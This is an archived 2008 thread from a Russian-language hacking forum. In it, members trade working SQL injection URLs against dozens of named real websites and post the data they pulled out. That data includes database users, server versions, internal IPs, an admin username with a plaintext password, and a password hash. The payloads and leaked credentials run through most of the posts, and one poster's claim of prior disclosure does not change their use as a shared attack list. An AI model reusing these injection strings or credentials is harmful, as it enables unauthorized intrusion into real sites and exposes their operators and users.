ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

19.06.2008, 20:04
|
|
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме: 1552920
Репутация:
369
|
|
В погоне за читами! =) Я читер, епт.
http://supercheats.com
Код:
http://teams.supercheats.com/category.php?cid=5'+union+select+1,2,concat_ws(char(58),screenname,*)+from+forum_users/*
Не смог подобрать название колонки ПАРОЛЯ. Чудом подобрал screenname, пароль ни в какую...
|
|
|

19.06.2008, 20:19
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме: 2252257
Репутация:
627
|
|
Смог найти имена таблиц:
Код:
http://www.gym2.km.ua/?id=-14+union+select+TABLE_NAME+FROM%20INFORMATION_SCHEMA.TABLES+limit+0,200/*
Нашел имена столбцов в jos_users
Код:
http://www.gym2.km.ua/?id=-14+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6A6F735F7573657273+limit+0,100/*
Но вот FATALITY не получается сделать, вроде все правильно написано, но выводить инфу не хочет.
Код:
http://www.gym2.km.ua/?id=-14+union+select+concat(id,%20char(58),name,char(58),username,char(58),password,char(58),usertype,char(58),block,char(58),0x3C62723E)+FROM+jos_users+limit+0,10/*
|
|
|

19.06.2008, 20:27
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
2 Лайт
Таблица в другой базе лови:
_http://www.gym2.km.ua/?id=-14+union+select+concat(id,char(58),name,char(58),u sername,char(58),password,char(58),usertype,char(5 8),block,char(58),0x3C62723E)+FROM+test.jos_users+ limit+0,10/*
|
|
|

19.06.2008, 22:05
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме: 4205500
Репутация:
930
|
|
.au
PR - 2
http://www.victimsupport.act.gov.au/content.php?id=33+order+by+1/*
PR - 4
http://www.agsafe.com.au/guardian/content.php?id=-3+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14/*
agsafe@localhos:4.1.11-Debian_4sarge7:agsafe
PR - 4
http://www.ecoaction.com.au/category.php?id=-55+union+select+1,2,3,aes_decrypt(aes_encrypt(user ()/version()/database(),0x71),0x71),5,6,7,8,9,10,11/*
enviro@localhost:4.1.11-Debian_4sarge7:enviro
http://www.ecoaction.com.au/category.php?id=-55+union+select+1,2,3,aes_decrypt(aes_encrypt(id/username/password,0x71),0x71),5,6,7,8,9,10,11+from+users/*
1:admin:m3mph15
PR - 4
http://www.agrifoodskills.net.au/display_announce.php?id=-1+union+select+concat_ws(0x3a,aes_decrypt(aes_encr ypt(user(),0x71),0x71),aes_decrypt(aes_encrypt(ver sion(),0x71),0x71),aes_decrypt(aes_encrypt(databas e(),0x71),0x71))/*
agrione@localhost:4.0.20a-nt:agrirev
PR - 4
http://www.onlymelbourne.com.au/melbourne.php?id=-4+union+select+1/*
PR - 5
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,aes_decrypt(aes_encrypt(user ()/version()/database(),0x71),0x71),5,6,7,8,9,10,11/*
winston@localhost:4.1.11-Debian_4sarge7:churchilltrust
PR - 5
http://www.isc.org.au/display_page.php?id=-12+union+select+concat_ws(0x3a,aes_decrypt(aes_enc rypt(user(),0x71),0x71),aes_decrypt(aes_encrypt(ve rsion(),0x71),0x71),aes_decrypt(aes_encrypt(databa se(),0x71),0x71))/*
fred294@localhost:5.0.27-community-nt:isc
PR - 6
http://www.overclockers.com.au/article.php?id=-1+union+select+1/*
Фильруется идентификатор страницы
На сегодня все. Без дефейсов пожалуйста )
И еще - тем, кто считает, что постят в данной теме только тупые "разрушители": Вся информация о найденных уязвимостях сначала отправляется администратору сайта и только потом выкладывается в данный раздел для ознакомления.
|
|
|

20.06.2008, 04:44
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме: 4140471
Репутация:
708
|
|
Код:
https://eed.llnl.gov/photos.php?id=7'+union+select+1,2,3,4,5,6,7,8,CONCAT(Version(),char(58),Database(),char(58),User()),10/*
|
|
|

20.06.2008, 05:48
|
|
Познающий
Регистрация: 23.03.2005
Сообщений: 40
Провел на форуме: 44404
Репутация:
13
|
|
Код:
http://www.jumpbite.com/browse.php?cat=15&page=0.01
|
|
|

20.06.2008, 07:12
|
|
Новичок
Регистрация: 18.06.2008
Сообщений: 3
Провел на форуме: 18067
Репутация:
3
|
|
Вот:
http://www.esen.education.fr/fr/ressources-par-type/detail-d-une-ressource/?idRessource=874=662e308c5d=1
|
|
|

20.06.2008, 16:51
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме: 1541753
Репутация:
552
|
|
Код:
http://www.bahamasdevelopmentbank.com/feature.php?id=-1+union+select+all+1,concat(user,0x3a,password),3,null,5,6,7+from+mysql.user+limit+1,1--
|
|
|

20.06.2008, 18:38
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме: 3629857
Репутация:
504
|
|
вот сегодня насобирал..
http://www.myauctionplanet.com/category.php?cate_id=0+union+select+1,version(),3/*
4.1.22-standard
http://www.myfundraisingauction.com/category.php?cate_id=-1283+union+select+1,version(),3,4/*
4.1.22-standard
http://www.point5.co.nz/category.php?cate_id=1+union+select+1,version(),3, 4/*
4.1.22-standard
http://www.tapinglobal.com/category.php?cate_id=-578+union+select+1,version(),3/*
5.0.45-community-log
http://www.loopp.com/00/navi/category.php?cate_id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,version(),29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62, 63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78/*
4.1.22-standard-log
http://www.dichroicimagery.com/auction/category.php?view=gallery&cate_id=-140+union+select+1,2,3,4,unhex(hex(version())),6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52/*
4.1.16
http://kiwibidz.com/category.php?cate_id=-965+union+select+1,version(),3,4/*
5.0.45
http://schoolhotlunch.org/category.php?cate_id=-10+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4/*&view=list
4.1.20-max-log::avanti_school@76.162.254.228::avanti_school
http://www.buyskool.com/category.php?cate_id=-730+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4/*&view=list
4.1.22-standard::wwwbuys_admin@localhost::wwwbuys_masterd b
http://bid4tackle.com/category.php?cate_id=-13+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4/*
5.0.45-log::micheal8311@10.3.16.1::bid4tackle
http://egyptexporters.com/category.php?cate_id=-109+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3/*
4.1.21-standard::webart_eexport@localhost::webart_export
http://market4d.com/category.php?cate_id=-140+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4/*
5.0.45::market@localhost::market
http://bidonlots.com/category.php?view=list&cate_id=-611+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3--
5.0.51a-community::wwwbil_peter@localhost::wwwbil_AJauctio n
http://www.zbid.co.uk/category.php?view=list&cate_id=-982+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3/*
4.1.22-standard::zbidco_auction@localhost::zbidco_auction e
http://nooglebid.com/category.php?cate_id=-156+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4--
5.0.51-log::thamesn_steve@web10.hostedservice.co.uk::tham esn_nooglebid
http://www.farmtofarm.net/category.php?view=list&cate_id=-1147+union+select+1,concat_ws(0x3a3a,version(),use r(),database()),3,4/*
4.1.22-standard-log::farmtofa_gerard@localhost::farmtofa_farmtofar m
http://repeatbargains.net/category.php?cate_id=-112+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3,4/*
5.0.45::repeat@localhost::repeat
http://auction434u.com/category.php?view=gallery&cate_id=-125+union+select+1,concat_ws(0x3a3a,version(),user (),database()),3/*
5.0.22::auction_admin@localhost::auction
http://www.free-auction.cn/category.php?cate_id=-71+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3/*
5.0.41-community-log::brownte_jsf@98.130.2.3::brownte_free-auction
http://www.grosist.ro/category.php?cate_id=-81+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4/*
4.1.20::bafgrosist@localhost:  mgrosist
Последний раз редактировалось gisTy; 20.06.2008 в 20:26..
|
|
|

20.06.2008, 19:43
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
gisTy
http://www.africanfreemarket.com
admin:$1$0da78.Z1$Z7LSg2oGyC1a6im6EqaSz1:admin@afr icafreebay.com
http://www.ebay-clone.com
admin:admin:admin@ajsquare.com
Последний раз редактировалось sabe; 20.06.2008 в 20:23..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|